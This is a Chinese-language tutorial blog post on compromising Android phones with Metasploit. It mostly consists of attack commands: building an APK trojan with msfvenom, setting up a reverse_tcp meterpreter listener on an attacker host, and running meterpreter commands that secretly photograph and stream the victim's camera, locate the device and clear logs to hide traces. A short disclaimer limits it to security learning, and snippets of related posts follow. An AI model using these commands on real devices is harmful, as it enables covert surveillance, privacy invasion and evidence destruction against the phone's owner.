MSF滲透安卓手機實戰 詳細

2021-10-12 19:12:27 字數 1450 閱讀 1446

利用msf生成apk木馬

在kali中會生成的木馬檔案:

設定payload引數

//開啟監聽

use exploit/multi/handler

//設定tcp監聽

set payload android/meterpreter/reverse_tcp

//設定攻擊主機ip

set lhost 攻擊主機ip位址

//設定監聽埠

set lport 4444

//執行

run

通過meterpreter命令來進行滲透

sysinfo  //獲取系統資訊

webcam_list    //檢視了攝像頭個數

webcam_snap    //拍照

webcam_stream   -i 1 //動態開啟前攝像頭

檢查裝置是否root

痕跡清除

使用clearev來清除日誌檔案

clearev   //清除日誌

常用meterpreter命令如下:

cd				-->目錄切換

cd / -->切換到根目錄

search -->搜尋檔案,命令:search text.jpg

webcam_list -->檢視攝像頭列表

webcam_snap -->拍照一張,需要選用前置或者後置攝像頭

check_root -->檢視當前安卓是否已經root

geolocate -->利用谷歌地圖定位(需要安裝谷歌地圖)

ps:僅供安全學習和教學用途,禁止非法使用。

msf滲透安卓手機

首先你需要kali系統 首先ifconfig檢視本機在區域網內的ip 使用msfvenom生成apk木馬 msfvenom p android meterpreter reverse tcp lhost 你在區域網內的ip 我的是192.168.0.13 lport 監聽的埠 我用的是8888 r ...

MSF入侵安卓手機

msf是metasploit的簡稱,metasploit是一款開源的安全漏洞檢測工具,非常強大,分別有windows版和linux版,工具裡整合了許多微軟公布的漏洞 0day 我這裡做測試的系統是backbox linux 這是一款網路滲透,資訊保安評估系統。裡邊安裝了許許多多的工具。其中msf就自...

安卓Config詳細介紹

android.graphics.bitmap類裡有乙個內部類bitmap.config類,在bitmap類裡createbitmap int width,int height,bitmap.config config 方法裡會用到,開啟個這個類一看 列舉變數 public static final...